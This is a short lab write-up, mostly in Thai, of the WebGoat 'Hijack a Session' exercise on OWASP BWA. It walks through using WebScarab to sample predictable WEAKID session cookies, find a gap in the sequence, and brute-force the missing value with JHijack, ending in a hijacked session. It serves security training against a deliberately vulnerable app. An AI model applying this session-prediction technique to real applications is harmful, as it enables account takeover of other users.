OwaspBWA - Hijack a Session

Session Management Flaws - Hijack a Session


สรุปได้ว่าค่า Session ID ถ้าไม่มีการ Random ไม่มีความซับซ้อน หรือการซุ่มแล้ว
Application จะเสี่ยงอย่างมากที่จะถูกการโจมตี session-based brute force attacks.
แต่...ในด่านทดสอบนี้ได้ทำการ Random ค่ามาเพื่อเพิ่มความปลอดภัยขึ้น



How to

  • Open Webscarab 
  • SessionID Analysis > Collection
ตัดออก
Cookie: WEAKID=18890-1422691696195; JSESSIONID=93B7C770F31947E5113AF94F5D5AFA52; //เหลือไว้เฉพาะเพียงค่า Session acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada

จะได้
JSESSIONID=0F0F2F70AB2D305814A0EEEC90316BA5


  • Click > Test
result =  localhost/webgoat WEAKID =18892-1422692488405
คำนวณช่วง WeakID และเติมเต็มมัน

  • Samples : 50 >> Fetch
  • Analysis : และทำการ Copy มา 3 บรรทัด
  • Export


  • Result : Empty Value in number 19633

19632-1422707686712
19633-1422707686 [712-812]  <!-- ตำแหน่งที่หายไปมีค่าของข้อมูลที่ห่างกันคือ 712-812
19634-1422707686812

  • Open > JHijack 
method          : GET
grep              : Congratulations 
sessionID     : JSESSIONID=93B7C770F31947E5113AF94F5D5AFA52 //Cookie value in Webscarab Request
hijacktype    : COOKIE
HijackID      : WEAKID = 19633-1422707686$
hijackdata    : numeric
range            : {712 - 812}

Result  : 19633-1422707686762  < Hacked
* Congratulations. You have successfully completed this lesson.